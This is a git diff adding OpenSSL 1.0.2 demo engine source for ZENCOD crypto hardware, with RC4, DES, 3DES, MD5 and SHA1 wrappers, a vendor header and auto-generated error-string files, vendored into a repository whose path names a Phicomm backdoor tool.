+    /* sizeof ( EVP_MD * ) + sizeof ( MD5_CTX ) */
+    sizeof(ZEN_MD_DATA)
+        /*
+         * sizeof ( MD_CTX_DATA ) The message digest data structure ...
+         */
+};
+
+/* The one for RC4 ... */
+#  define EVP_RC4_KEY_SIZE                        16
+
+/* Try something static ... */
+typedef struct {
+    unsigned int len;
+    unsigned int first;
+    unsigned char rc4_state[260];
+} NEW_ZEN_RC4_KEY;
+
+#  define rc4_data(ctx)                           ( (EVP_RC4_KEY *) ( ctx )->cipher_data )
+
+static const EVP_CIPHER engine_rc4 = {
+    NID_rc4,
+    1,
+    16,                         /* EVP_RC4_KEY_SIZE should be 128 bits */
+    0,                          /* FIXME: key should be up to 256 bytes */
+    EVP_CIPH_VARIABLE_LENGTH,
+    engine_rc4_init_key,
+    engine_rc4_cipher,
+    engine_cipher_cleanup,
+    sizeof(NEW_ZEN_RC4_KEY),
+    NULL,
+    NULL,
+    NULL
+};
+
+/* The one for RC4_40 ... */
+static const EVP_CIPHER engine_rc4_40 = {
+    NID_rc4_40,
+    1,
+    5,                          /* 40 bits */
+    0,
+    EVP_CIPH_VARIABLE_LENGTH,
+    engine_rc4_init_key,
+    engine_rc4_cipher,
+    engine_cipher_cleanup,
+    sizeof(NEW_ZEN_RC4_KEY),
+    NULL,
+    NULL,
+    NULL
+};
+
+/* The one for DES ... */
+
+/* Try something static ... */
+typedef struct {
+    unsigned char des_key[24];
+    unsigned char des_iv[8];
+} ZEN_DES_KEY;
+
+static const EVP_CIPHER engine_des_cbc = {
+    NID_des_cbc,
+    8, 8, 8,
+    0 | EVP_CIPH_CBC_MODE,
+    engine_des_init_key,
+    engine_des_cbc_cipher,
+    engine_cipher_cleanup,
+    sizeof(ZEN_DES_KEY),
+    EVP_CIPHER_set_asn1_iv,
+    EVP_CIPHER_get_asn1_iv,
+    NULL,
+    NULL
+};
+
+/* The one for 3DES ... */
+
+/* Try something static ... */
+typedef struct {
+    unsigned char des3_key[24];
+    unsigned char des3_iv[8];
+} ZEN_3DES_KEY;
+
+#  define des_data(ctx)                            ( (DES_EDE_KEY *) ( ctx )->cipher_data )
+
+static const EVP_CIPHER engine_des_ede3_cbc = {
+    NID_des_ede3_cbc,
+    8, 8, 8,
+    0 | EVP_CIPH_CBC_MODE,
+    engine_des_ede3_init_key,
+    engine_des_ede3_cbc_cipher,
+    engine_cipher_cleanup,
+    sizeof(ZEN_3DES_KEY),
+    EVP_CIPHER_set_asn1_iv,
+    EVP_CIPHER_get_asn1_iv,
+    NULL,
+    NULL
+};
+
+/* General function cloned on hw_openbsd_dev_crypto one ... */
+static int engine_digests(ENGINE *e, const EVP_MD **digest, const int **nids,
+                          int nid)
+{
+
+#  ifdef DEBUG_ZENCOD_MD
+    fprintf(stderr, "\t=>Function : static int engine_digests () called !\n");
+#  endif
+
+    if (!digest) {
+        /* We are returning a list of supported nids */
+        *nids = engine_digest_nids;
+        return engine_digest_nids_num;
+    }
+    /* We are being asked for a specific digest */
+    if (nid == NID_md5) {
+        *digest = &engine_md5_md;
+    } else if (nid == NID_sha1) {
+        *digest = &engine_sha1_md;
+    } else {
+        *digest = NULL;
+        return 0;
+    }
+    return 1;
+}
+
+/*
+ * SHA stuff Functions
+ */
+static int engine_sha1_init(EVP_MD_CTX *ctx)
+{
+
+    int to_return = 0;
+
+    /* Test with zenbridge library ... */
+    to_return = ptr_zencod_sha1_init((ZEN_MD_DATA *)ctx->md_data);
+    to_return = !to_return;
+
+    return to_return;
+}
+
+static int engine_sha1_update(EVP_MD_CTX *ctx, const void *data,
+                              unsigned long count)
+{
+
+    zen_nb_t input;
+    int to_return = 0;
+
+    /* Convert parameters ... */
+    input.len = count;
+    input.data = (unsigned char *)data;
+
+    /* Test with zenbridge library ... */
+    to_return =
+        ptr_zencod_sha1_update((ZEN_MD_DATA *)ctx->md_data,
+                               (const zen_nb_t *)&input);
+    to_return = !to_return;
+
+    return to_return;
+}
+
+static int engine_sha1_final(EVP_MD_CTX *ctx, unsigned char *md)
+{
+
+    zen_nb_t output;
+    int to_return = 0;
+
+    /* Convert parameters ... */
+    output.len = SHA_DIGEST_LENGTH;
+    output.data = md;
+
+    /* Test with zenbridge library ... */
+    to_return =
+        ptr_zencod_sha1_do_final((ZEN_MD_DATA *)ctx->md_data,
+                                 (zen_nb_t *) & output);
+    to_return = !to_return;
+
+    return to_return;
+}
+
+/*
+ * MD5 stuff Functions
+ */
+static int engine_md5_init(EVP_MD_CTX *ctx)
+{
+
+    int to_return = 0;
+
+    /* Test with zenbridge library ... */
+    to_return = ptr_zencod_md5_init((ZEN_MD_DATA *)ctx->md_data);
+    to_return = !to_return;
+
+    return to_return;
+}
+
+static int engine_md5_update(EVP_MD_CTX *ctx, const void *data,
+                             unsigned long count)
+{
+
+    zen_nb_t input;
+    int to_return = 0;
+
+    /* Convert parameters ... */
+    input.len = count;
+    input.data = (unsigned char *)data;
+
+    /* Test with zenbridge library ... */
+    to_return =
+        ptr_zencod_md5_update((ZEN_MD_DATA *)ctx->md_data,
+                              (const zen_nb_t *)&input);
+    to_return = !to_return;
+
+    return to_return;
+}
+
+static int engine_md5_final(EVP_MD_CTX *ctx, unsigned char *md)
+{
+
+    zen_nb_t output;
+    int to_return = 0;
+
+    /* Convert parameters ... */
+    output.len = MD5_DIGEST_LENGTH;
+    output.data = md;
+
+    /* Test with zenbridge library ... */
+    to_return =
+        ptr_zencod_md5_do_final((ZEN_MD_DATA *)ctx->md_data,
+                                (zen_nb_t *) & output);
+    to_return = !to_return;
+
+    return to_return;
+}
+
+static int engine_md_cleanup(EVP_MD_CTX *ctx)
+{
+
+    ZEN_MD_DATA *zen_md_data = (ZEN_MD_DATA *)ctx->md_data;
+
+    if (zen_md_data->HashBuffer != NULL) {
+        OPENSSL_free(zen_md_data->HashBuffer);
+        zen_md_data->HashBufferSize = 0;
+        ctx->md_data = NULL;
+    }
+
+    return 1;
+}
+
+static int engine_md_copy(EVP_MD_CTX *to, const EVP_MD_CTX *from)
+{
+    const ZEN_MD_DATA *from_md = (ZEN_MD_DATA *)from->md_data;
+    ZEN_MD_DATA *to_md = (ZEN_MD_DATA *)to->md_data;
+
+    to_md->HashBuffer = OPENSSL_malloc(from_md->HashBufferSize);
+    memcpy(to_md->HashBuffer, from_md->HashBuffer, from_md->HashBufferSize);
+
+    return 1;
+}
+
+/* General function cloned on hw_openbsd_dev_crypto one ... */
+static int engine_ciphers(ENGINE *e, const EVP_CIPHER **cipher,
+                          const int **nids, int nid)
+{
+
+    if (!cipher) {
+        /* We are returning a list of supported nids */
+        *nids = engine_cipher_nids;
+        return engine_cipher_nids_num;
+    }
+    /* We are being asked for a specific cipher */
+    if (nid == NID_rc4) {
+        *cipher = &engine_rc4;
+    } else if (nid == NID_rc4_40) {
+        *cipher = &engine_rc4_40;
+    } else if (nid == NID_des_cbc) {
+        *cipher = &engine_des_cbc;
+    } else if (nid == NID_des_ede3_cbc) {
+        *cipher = &engine_des_ede3_cbc;
+    } else {
+        *cipher = NULL;
+        return 0;
+    }
+
+    return 1;
+}
+
+static int engine_rc4_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                               const unsigned char *iv, int enc)
+{
+    int to_return = 0;
+    int i = 0;
+    int nb = 0;
+    NEW_ZEN_RC4_KEY *tmp_rc4_key = NULL;
+
+    tmp_rc4_key = (NEW_ZEN_RC4_KEY *) (ctx->cipher_data);
+    tmp_rc4_key->first = 0;
+    tmp_rc4_key->len = ctx->key_len;
+    tmp_rc4_key->rc4_state[0] = 0x00;
+    tmp_rc4_key->rc4_state[2] = 0x00;
+    nb = 256 / ctx->key_len;
+    for (i = 0; i < nb; i++) {
+        memcpy(&(tmp_rc4_key->rc4_state[4 + i * ctx->key_len]), key,
+               ctx->key_len);
+    }
+
+    to_return = 1;
+
+    return to_return;
+}
+
+static int engine_rc4_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                             const unsigned char *in, unsigned int in_len)
+{
+
+    zen_nb_t output, input;
+    zen_nb_t rc4key;
+    int to_return = 0;
+    NEW_ZEN_RC4_KEY *tmp_rc4_key = NULL;
+
+    /* Convert parameters ... */
+    input.len = in_len;
+    input.data = (unsigned char *)in;
+    output.len = in_len;
+    output.data = (unsigned char *)out;
+
+    tmp_rc4_key = ((NEW_ZEN_RC4_KEY *) (ctx->cipher_data));
+    rc4key.len = 260;
+    rc4key.data = &(tmp_rc4_key->rc4_state[0]);
+
+    /* Test with zenbridge library ... */
+    to_return =
+        ptr_zencod_rc4_cipher(&output, &input, (const zen_nb_t *)&rc4key,
+                              &(tmp_rc4_key->rc4_state[0]),
+                              &(tmp_rc4_key->rc4_state[3]),
+                              !tmp_rc4_key->first);
+    to_return = !to_return;
+
+    /* Update encryption state ... */
+    tmp_rc4_key->first = 1;
+    tmp_rc4_key = NULL;
+
+    return to_return;
+}
+
+static int engine_des_init_key(EVP_CIPHER_CTX *ctx, const unsigned char *key,
+                               const unsigned char *iv, int enc)
+{
+
+    ZEN_DES_KEY *tmp_des_key = NULL;
+    int to_return = 0;
+
+    tmp_des_key = (ZEN_DES_KEY *) (ctx->cipher_data);
+    memcpy(&(tmp_des_key->des_key[0]), key, 8);
+    memcpy(&(tmp_des_key->des_key[8]), key, 8);
+    memcpy(&(tmp_des_key->des_key[16]), key, 8);
+    memcpy(&(tmp_des_key->des_iv[0]), iv, 8);
+
+    to_return = 1;
+
+    return to_return;
+}
+
+static int engine_des_cbc_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                                 const unsigned char *in, unsigned int inl)
+{
+
+    zen_nb_t output, input;
+    zen_nb_t deskey_1, deskey_2, deskey_3, iv;
+    int to_return = 0;
+
+    /* Convert parameters ... */
+    input.len = inl;
+    input.data = (unsigned char *)in;
+    output.len = inl;
+    output.data = out;
+
+    /* Set key parameters ... */
+    deskey_1.len = 8;
+    deskey_2.len = 8;
+    deskey_3.len = 8;
+    deskey_1.data =
+        (unsigned char *)((ZEN_DES_KEY *) (ctx->cipher_data))->des_key;
+    deskey_2.data =
+        (unsigned char *)&((ZEN_DES_KEY *) (ctx->cipher_data))->des_key[8];
+    deskey_3.data =
+        (unsigned char *)&((ZEN_DES_KEY *) (ctx->cipher_data))->des_key[16];
+
+    /* Key correct iv ... */
+    memcpy(((ZEN_DES_KEY *) (ctx->cipher_data))->des_iv, ctx->iv, 8);
+    iv.len = 8;
+    iv.data = (unsigned char *)((ZEN_DES_KEY *) (ctx->cipher_data))->des_iv;
+
+    if (ctx->encrypt == 0) {
+        memcpy(ctx->iv, &(input.data[input.len - 8]), 8);
+    }
+
+    /* Test with zenbridge library ... */
+    to_return = ptr_zencod_xdes_cipher(&output, &input,
+                                       (zen_nb_t *) & deskey_1,
+                                       (zen_nb_t *) & deskey_2,
+                                       (zen_nb_t *) & deskey_3, &iv,
+                                       ctx->encrypt);
+    to_return = !to_return;
+
+    /*
+     * But we need to set up the rigth iv ... Test ENCRYPT or DECRYPT mode to
+     * set iv ...
+     */
+    if (ctx->encrypt == 1) {
+        memcpy(ctx->iv, &(output.data[output.len - 8]), 8);
+    }
+
+    return to_return;
+}
+
+static int engine_des_ede3_init_key(EVP_CIPHER_CTX *ctx,
+                                    const unsigned char *key,
+                                    const unsigned char *iv, int enc)
+{
+
+    ZEN_3DES_KEY *tmp_3des_key = NULL;
+    int to_return = 0;
+
+    tmp_3des_key = (ZEN_3DES_KEY *) (ctx->cipher_data);
+    memcpy(&(tmp_3des_key->des3_key[0]), key, 24);
+    memcpy(&(tmp_3des_key->des3_iv[0]), iv, 8);
+
+    to_return = 1;
+
+    return to_return;
+}
+
+static int engine_des_ede3_cbc_cipher(EVP_CIPHER_CTX *ctx, unsigned char *out,
+                                      const unsigned char *in,
+                                      unsigned int in_len)
+{
+
+    zen_nb_t output, input;
+    zen_nb_t deskey_1, deskey_2, deskey_3, iv;
+    int to_return = 0;
+
+    /* Convert parameters ... */
+    input.len = in_len;
+    input.data = (unsigned char *)in;
+    output.len = in_len;
+    output.data = out;
+
+    /* Set key ... */
+    deskey_1.len = 8;
+    deskey_2.len = 8;
+    deskey_3.len = 8;
+    deskey_1.data =
+        (unsigned char *)((ZEN_3DES_KEY *) (ctx->cipher_data))->des3_key;
+    deskey_2.data =
+        (unsigned char *)&((ZEN_3DES_KEY *) (ctx->cipher_data))->des3_key[8];
+    deskey_3.data =
+        (unsigned char *)&((ZEN_3DES_KEY *) (ctx->cipher_data))->des3_key[16];
+
+    /* Key correct iv ... */
+    memcpy(((ZEN_3DES_KEY *) (ctx->cipher_data))->des3_iv, ctx->iv, 8);
+    iv.len = 8;
+    iv.data = (unsigned char *)((ZEN_3DES_KEY *) (ctx->cipher_data))->des3_iv;
+
+    if (ctx->encrypt == 0) {
+        memcpy(ctx->iv, &(input.data[input.len - 8]), 8);
+    }
+
+    /* Test with zenbridge library ... */
+    to_return = ptr_zencod_xdes_cipher(&output, &input,
+                                       (zen_nb_t *) & deskey_1,
+                                       (zen_nb_t *) & deskey_2,
+                                       (zen_nb_t *) & deskey_3, &iv,
+                                       ctx->encrypt);
+    to_return = !to_return;
+
+    if (ctx->encrypt == 1) {
+        memcpy(ctx->iv, &(output.data[output.len - 8]), 8);
+    }
+
+    return to_return;
+}
+
+static int engine_cipher_cleanup(EVP_CIPHER_CTX *ctx)
+{
+
+    /* Set the key pointer ... */
+    if (ctx->cipher->nid == NID_rc4 || ctx->cipher->nid == NID_rc4_40) {
+    } else if (ctx->cipher->nid == NID_des_cbc) {
+    } else if (ctx->cipher->nid == NID_des_ede3_cbc) {
+    }
+
+    return 1;
+}
+
+# endif                         /* !OPENSSL_NO_HW_ZENCOD */
+#endif                          /* !OPENSSL_NO_HW */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/zencod/hw_zencod.ec b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/zencod/hw_zencod.ec
new file mode 100644
index 0000000..1552c79
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/zencod/hw_zencod.ec
@@ -0,0 +1,8 @@
+# configuration file for util/mkerr.pl
+#
+# use like this:
+#
+#	perl ../../../util/mkerr.pl -conf hw_zencod.ec \
+#		-nostatic -staticloader -write *.c
+
+L ZENCOD	hw_zencod_err.h			hw_zencod_err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/zencod/hw_zencod.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/zencod/hw_zencod.h
new file mode 100644
index 0000000..a251045
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/zencod/hw_zencod.h
@@ -0,0 +1,159 @@
+/* File : /crypto/engine/vendor_defns/hw_zencod.h */
+/* ====================================================================
+ * Written by Donnat Frederic (frederic.donnat@zencod.com) from ZENCOD
+ * for "zencod" ENGINE integration in OpenSSL project.
+ */
+
+#ifndef        _HW_ZENCOD_H_
+# define _HW_ZENCOD_H_
+
+# include <stdio.h>
+
+# ifdef  __cplusplus
+extern "C" {
+# endif                         /* __cplusplus */
+
+# define ZENBRIDGE_MAX_KEYSIZE_RSA       2048
+# define ZENBRIDGE_MAX_KEYSIZE_RSA_CRT   1024
+# define ZENBRIDGE_MAX_KEYSIZE_DSA_SIGN  1024
+# define ZENBRIDGE_MAX_KEYSIZE_DSA_VRFY  1024
+
+/* Library version computation */
+# define ZENBRIDGE_VERSION_MAJOR(x)      (((x) >> 16) | 0xff)
+# define ZENBRIDGE_VERSION_MINOR(x)      (((x) >>  8) | 0xff)
+# define ZENBRIDGE_VERSION_PATCH(x)      (((x) >>  0) | 0xff)
+# define ZENBRIDGE_VERSION(x, y, z)              ((x) << 16 | (y) << 8 | (z))
+
+    /*
+     * Memory type
+     */
+    typedef struct zencod_number_s {
+        unsigned long len;
+        unsigned char *data;
+    } zen_nb_t;
+
+# define KEY     zen_nb_t
+
+    /*
+     * Misc
+     */
+    typedef int t_zencod_lib_version(void);
+    typedef int t_zencod_hw_version(void);
+    typedef int t_zencod_test(void);
+    typedef int t_zencod_dump_key(FILE *stream, char *msg, KEY * key);
+
+    /*
+     * Key management tools
+     */
+    typedef KEY *t_zencod_new_number(unsigned long len, unsigned char *data);
+    typedef int t_zencod_init_number(KEY * n, unsigned long len,
+                                     unsigned char *data);
+    typedef unsigned long t_zencod_bytes2bits(unsigned char *n,
+                                              unsigned long bytes);
+    typedef unsigned long t_zencod_bits2bytes(unsigned long bits);
+
+    /*
+     * RSA API
+     */
+/* Compute modular exponential : y = x**e | n */
+    typedef int t_zencod_rsa_mod_exp(KEY * y, KEY * x, KEY * n, KEY * e);
+    /*
+     * Compute modular exponential : y1 = (x | p)**edp | p, y2 = (x | p)**edp
+     * | p, y = y2 + (qinv * (y1 - y2) | p) * q
+     */
+    typedef int t_zencod_rsa_mod_exp_crt(KEY * y, KEY * x, KEY * p, KEY * q,
+                                         KEY * edp, KEY * edq, KEY * qinv);
+
+    /*
+     * DSA API
+     */
+    typedef int t_zencod_dsa_do_sign(unsigned int hash, KEY * data,
+                                     KEY * random, KEY * p, KEY * q, KEY * g,
+                                     KEY * x, KEY * r, KEY * s);
+    typedef int t_zencod_dsa_do_verify(unsigned int hash, KEY * data, KEY * p,
+                                       KEY * q, KEY * g, KEY * y, KEY * r,
+                                       KEY * s, KEY * v);
+
+    /*
+     * DH API
+     */
+    /* Key generation : compute public value y = g**x | n */
+    typedef int t_zencod_dh_generate_key(KEY * y, KEY * x, KEY * g, KEY * n,
+                                         int gen_x);
+    typedef int t_zencod_dh_compute_key(KEY * k, KEY * y, KEY * x, KEY * n);
+
+    /*
+     * RNG API
+     */
+# define ZENBRIDGE_RNG_DIRECT            0
+# define ZENBRIDGE_RNG_SHA1              1
+    typedef int t_zencod_rand_bytes(KEY * rand, unsigned int flags);
+
+    /*
+     * Math API
+     */
+    typedef int t_zencod_math_mod_exp(KEY * r, KEY * a, KEY * e, KEY * n);
+
+    /*
+     * Symetric API
+     */
+/* Define a data structure for digests operations */
+    typedef struct ZEN_data_st {
+        unsigned int HashBufferSize;
+        unsigned char *HashBuffer;
+    } ZEN_MD_DATA;
+
+    /*
+     * Functions for Digest (MD5, SHA1) stuff
+     */
+    /* output : output data buffer */
+    /* input : input data buffer */
+    /* algo : hash algorithm, MD5 or SHA1 */
+    /*-
+     * typedef int t_zencod_hash ( KEY *output, const KEY *input, int algo ) ;
+     * typedef int t_zencod_sha_hash ( KEY *output, const KEY *input, int algo ) ;
+     */
+    /* For now separate this stuff that mad it easier to test */
+    typedef int t_zencod_md5_init(ZEN_MD_DATA *data);
+    typedef int t_zencod_md5_update(ZEN_MD_DATA *data, const KEY * input);
+    typedef int t_zencod_md5_do_final(ZEN_MD_DATA *data, KEY * output);
+
+    typedef int t_zencod_sha1_init(ZEN_MD_DATA *data);
+    typedef int t_zencod_sha1_update(ZEN_MD_DATA *data, const KEY * input);
+    typedef int t_zencod_sha1_do_final(ZEN_MD_DATA *data, KEY * output);
+
+    /*
+     * Functions for Cipher (RC4, DES, 3DES) stuff
+     */
+/* output : output data buffer */
+/* input : input data buffer */
+/* key : rc4 key data */
+/* index_1 : value of index x from RC4 key structure */
+/* index_2 : value of index y from RC4 key structure */
+    /*
+     * Be carefull : RC4 key should be expanded before calling this method
+     * (Should we provide an expand function ??)
+     */
+    typedef int t_zencod_rc4_cipher(KEY * output, const KEY * input,
+                                    const KEY * key, unsigned char *index_1,
+                                    unsigned char *index_2, int mode);
+
+/* output : output data buffer */
+/* input : input data buffer */
+/* key_1 : des first key data */
+/* key_2 : des second key data */
+/* key_3 : des third key data */
+/* iv : initial vector */
+/* mode : xdes mode (encrypt or decrypt) */
+/* Be carefull : In DES mode key_1 = key_2 = key_3 (as far as i can see !!) */
+    typedef int t_zencod_xdes_cipher(KEY * output, const KEY * input,
+                                     const KEY * key_1, const KEY * key_2,
+                                     const KEY * key_3, const KEY * iv,
+                                     int mode);
+
+# undef KEY
+
+# ifdef  __cplusplus
+}
+# endif                         /* __cplusplus */
+#endif                          /* !_HW_ZENCOD_H_ */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/zencod/hw_zencod_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/zencod/hw_zencod_err.c
new file mode 100644
index 0000000..ff2b592
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/zencod/hw_zencod_err.c
@@ -0,0 +1,147 @@
+/* hw_zencod_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include "hw_zencod_err.h"
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+static ERR_STRING_DATA ZENCOD_str_functs[] = {
+    {ERR_PACK(0, ZENCOD_F_ZENCOD_BN_MOD_EXP, 0), "ZENCOD_BN_MOD_EXP"},
+    {ERR_PACK(0, ZENCOD_F_ZENCOD_CTRL, 0), "ZENCOD_CTRL"},
+    {ERR_PACK(0, ZENCOD_F_ZENCOD_DH_COMPUTE, 0), "ZENCOD_DH_COMPUTE"},
+    {ERR_PACK(0, ZENCOD_F_ZENCOD_DH_GENERATE, 0), "ZENCOD_DH_GENERATE"},
+    {ERR_PACK(0, ZENCOD_F_ZENCOD_DSA_DO_SIGN, 0), "ZENCOD_DSA_DO_SIGN"},
+    {ERR_PACK(0, ZENCOD_F_ZENCOD_DSA_DO_VERIFY, 0), "ZENCOD_DSA_DO_VERIFY"},
+    {ERR_PACK(0, ZENCOD_F_ZENCOD_FINISH, 0), "ZENCOD_FINISH"},
+    {ERR_PACK(0, ZENCOD_F_ZENCOD_INIT, 0), "ZENCOD_INIT"},
+    {ERR_PACK(0, ZENCOD_F_ZENCOD_RAND, 0), "ZENCOD_RAND"},
+    {ERR_PACK(0, ZENCOD_F_ZENCOD_RSA_MOD_EXP, 0), "ZENCOD_RSA_MOD_EXP"},
+    {ERR_PACK(0, ZENCOD_F_ZENCOD_RSA_MOD_EXP_CRT, 0),
+     "ZENCOD_RSA_MOD_EXP_CRT"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA ZENCOD_str_reasons[] = {
+    {ZENCOD_R_ALREADY_LOADED, "already loaded"},
+    {ZENCOD_R_BAD_KEY_COMPONENTS, "bad key components"},
+    {ZENCOD_R_BN_EXPAND_FAIL, "bn expand fail"},
+    {ZENCOD_R_CTRL_COMMAND_NOT_IMPLEMENTED, "ctrl command not implemented"},
+    {ZENCOD_R_DSO_FAILURE, "dso failure"},
+    {ZENCOD_R_NOT_LOADED, "not loaded"},
+    {ZENCOD_R_REQUEST_FAILED, "request failed"},
+    {ZENCOD_R_UNIT_FAILURE, "unit failure"},
+    {0, NULL}
+};
+
+#endif
+
+#ifdef ZENCOD_LIB_NAME
+static ERR_STRING_DATA ZENCOD_lib_name[] = {
+    {0, ZENCOD_LIB_NAME},
+    {0, NULL}
+};
+#endif
+
+static int ZENCOD_lib_error_code = 0;
+static int ZENCOD_error_init = 1;
+
+static void ERR_load_ZENCOD_strings(void)
+{
+    if (ZENCOD_lib_error_code == 0)
+        ZENCOD_lib_error_code = ERR_get_next_error_library();
+
+    if (ZENCOD_error_init) {
+        ZENCOD_error_init = 0;
+#ifndef OPENSSL_NO_ERR
+        ERR_load_strings(ZENCOD_lib_error_code, ZENCOD_str_functs);
+        ERR_load_strings(ZENCOD_lib_error_code, ZENCOD_str_reasons);
+#endif
+
+#ifdef ZENCOD_LIB_NAME
+        ZENCOD_lib_name->error = ERR_PACK(ZENCOD_lib_error_code, 0, 0);
+        ERR_load_strings(0, ZENCOD_lib_name);
+#endif
+    }
+}
+
+static void ERR_unload_ZENCOD_strings(void)
+{
+    if (ZENCOD_error_init == 0) {
+#ifndef OPENSSL_NO_ERR
+        ERR_unload_strings(ZENCOD_lib_error_code, ZENCOD_str_functs);
+        ERR_unload_strings(ZENCOD_lib_error_code, ZENCOD_str_reasons);
+#endif
+
+#ifdef ZENCOD_LIB_NAME
+        ERR_unload_strings(0, ZENCOD_lib_name);
+#endif
+        ZENCOD_error_init = 1;
+    }
+}
+
+static void ERR_ZENCOD_error(int function, int reason, char *file, int line)
+{
+    if (ZENCOD_lib_error_code == 0)
+        ZENCOD_lib_error_code = ERR_get_next_error_library();
+    ERR_PUT_error(ZENCOD_lib_error_code, function, reason, file, line);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/zencod/hw_zencod_err.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/zencod/hw_zencod_err.h
new file mode 100644
index 0000000..f4a8358
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/demos/engines/zencod/hw_zencod_err.h
@@ -0,0 +1,100 @@
+/* ====================================================================
+ * Copyright (c) 2001-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
